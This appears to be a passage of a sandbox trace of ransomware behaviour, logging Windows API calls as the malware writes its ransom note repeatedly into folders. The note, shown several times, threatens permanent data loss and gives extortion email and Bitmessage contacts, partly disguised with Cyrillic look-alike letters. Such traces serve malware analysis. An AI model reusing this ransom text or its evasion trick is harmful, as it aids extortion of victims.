!!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.072] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.073] CloseHandle (hObject=0x294) returned 1 [0285.073] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\#readme_eman#.rtf")) returned 0xffffffff [0285.073] GetLastError () returned 0x2 [0285.073] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 